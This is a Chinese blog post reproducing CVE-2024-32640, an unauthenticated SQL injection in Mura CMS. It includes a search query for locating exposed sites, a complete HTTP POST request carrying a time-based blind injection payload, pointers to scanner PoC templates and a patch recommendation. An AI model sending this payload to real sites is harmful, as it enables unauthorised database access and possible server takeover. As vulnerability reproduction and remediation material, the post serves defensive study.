【漏洞复现】Mura CMS processAsyncObject SQL注入漏洞(CVE-2024-32640)

已于 2024-06-30 14:29:58 修改
阅读量289 收藏 1
点赞数 6
分类专栏: 漏洞复现篇 文章标签: sql MuraCMS
于 2024-06-30 14:14:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140080348
版权

0x01 产品简介

Mura CMS(Content Management System)是一款用于创建和管理网站内容的开源 内容管理系统。它具有许多功能和灵活性,使其成为许多网站开发者和内容创作者的首选工具。是一个强大的企业网站解决方案,可用于创建和管理公司网站、产品目录、新闻发布、客户支持和联系信息等内容。

0x02 漏洞概述

2024年5月8日,互联网上披露其存在CVE-2024-32640 MuraCMS processAsyncObject sql注入漏洞,未经身份验证的远程攻击者可利用此漏洞 构造恶意请求获取数据库中的敏感信息,深入利用可写入后门文件可造成远程代码执行获取服务器权限。

0x03 搜索引擎

"Mura CMS"

在这里插入图片描述

0x04 漏洞复现

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
 
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

在这里插入图片描述

0x05 POC脚本获取

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

关闭互联网暴露面或接口设置访问权限
官方已发布 7.4.6、7.3.13 、7.2.8补丁版本,建议升级至最新版本。

SuperherRo
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Mura CMS processAsyncObject SQL注入漏洞复现(CVE-2024-32640)
0xSec
05-10 771
2024年5月8日,互联网上披露其存在CVE-2024-32640 MuraCMS processAsyncObject SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞 构造恶意请求获取数据库中的敏感信息,深入利用可写入后门文件可造成远程代码执行获取服务器权限。
ServiceNow UI Jelly模板注入漏洞复现(CVE-2024-4879)
最新发布
0xSec
07-14 458
由于ServiceNow的Jelly模板输入验证不严格,导致未经身份验证的远程攻击者可通过构造恶意请求利用,在ServiceNow中远程执行代码,获取数据库配置等等,使系统处于极不安全的状态。
hvv在即,我们整理了 2024 年部分勒索漏洞清单
FreeBuf_的博客
05-08 1288
可通过官方补丁更新解决该威胁,免费更新链接:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?威胁者可向用户发送恶意文件并诱导用户打开文件来利用该漏洞,成功利用可能导致绕过 SmartScreen安全功能。
Goby 漏洞发布| 瑞友天翼应用虚拟化系统 /hmrao.php SQL注入漏洞
m0_46699477的博客
05-13 360
瑞友天翼应用虚拟化系统是基于服务器计算(Server-based Computing)架构的应用虚拟化平台。它将用户 各种应用软件(ERP/OA/CRM…)集中部署在瑞友天翼服务器(群)上,客户端通过 WEB 即可快速安全的访问经服务器上授权 的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。
复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 726
复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
漏洞复现】OpenMetadata 命令执行漏洞复现(CVE-2024-28255)
KKleeeaa的博客
04-11 398
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。然后就是反弹shell,nc连。0x01FOFA测绘。
2018年CMS评论家公布了最好的CMS获奖者
weixin_34080951的博客
02-22 706
2019独角兽企业重金招聘Python工程师标准>>> ...
Goby 漏洞发布|Masa/Mura CMS /index.cfm/_api/json/v1/default/ SQL 注入漏洞CVE-2024-32640
m0_46699477的博客
05-15 376
Mura CMS是一个强大的企业网站解决方案,可用于创建和管理公司网站、产品目录、新闻发布、客户支持和联系信息等内容。学校、大学和培训机构也可以使用Mura CMS来创建在线学习平台、课程目录和学生信息系统。Mura CMS /index.cfm/_api/json/v1/default/ 接口存在SQL注入漏洞,攻击者利用该漏洞可以执行sql语句,获取数据库数据。
MuraCategoryMenu:Mura CMS显示对象提供使用类别的文件夹的菜单导航
05-12
Mura使用类别(存档)在文件夹中导航的唯一选择不满意吗? 此显示对象提供了2个其他用户界面: 等级表 下拉式菜单 菜单将使用所选父类别中的类别自动填充。 要安装,只需复制主题主题的modules文件夹中的...
DenseNet-MURA-PyTorch:使用PyTorch在Standford的MURA数据集上实现DenseNet模型
05-13
MURA数据集上实现169层模型的PyTorch实现,灵感来自Pranav Rajpurkar等人的论文 。 MURA是肌肉骨骼X射线照片的大型数据集,其中放射医师手动将每项研究标记为正常或异常。 重要事项: 所实现的模型是169层Dense...
NS Mura开始「NS Mura Start」-crx插件
03-11
用start.nsmura.si覆盖主页和newtab页面 这个插件为你设置start.nsmura.si的开始页面和新标签 支持语言:slovenščina
mura-js:Mura Core JS客户端
04-03
Mura.js是可与Mura CMS JSON / REST API进行交互的javscript实用程序 Mura CMS是由创建的CFML开源内容管理系统。 Mura旨在供市场部门,网页设计师和开发人员使用。 安装 浏览器 [removed][removed] 巴别塔 Babel是...
ongaku-mura:涌村
05-11
Ongaku mura(日文音乐村)是一个去中心化的应用程序,是一个音乐平台,混搭音乐的创作者可以在该平台上直接与采样音乐的原始创作者就许可费进行谈判。 如果您有兴趣,可以在 找到详细信息 在本地环境中设置菌落网络...
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
cao919的专栏Net
07-13 749
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 806
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 333
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
SQL面试题-留存率计算
xiao4816的博客
07-07 459
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
mura检测 完整单词
11-11
Mura检测是指在生产过程中对产品进行检查,以确保产品的表面质量完整无损。这项检测通常通过视觉检测系统进行,利用相机和图像处理技术来检测产品的表面,特别是对一些细微的瑕疵和缺陷进行检测。在制造业中,产品的表面质量对产品的最终质量和外观有着重要的影响,因此Mura检测对于保证产品质量具有非常重要的意义。 Mura检测通常涉及到大量的数据处理和图像识别技术,其过程需要高精度的相机设备和专业的图像处理算法。通过Mura检测,可以及时发现产品表面的瑕疵和缺陷,避免缺陷产品流入市场,保证产品质量,降低售后服务成本和维护成本。同时,Mura检测也可以帮助生产企业提高生产效率,降低废品率,提高产品的市场竞争力。 Mura检测在汽车制造、电子产品、玻璃制造、医疗器械等行业得到了广泛应用,成为生产过程中不可或缺的一环。随着人工智能和机器学习技术的不断发展,Mura检测系统的性能和精度也在不断提升,为产品质量的保障和生产效率的提高提供了有效的技术支持。可以预见,Mura检测技术将在未来的制造业中发挥更为重要的作用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值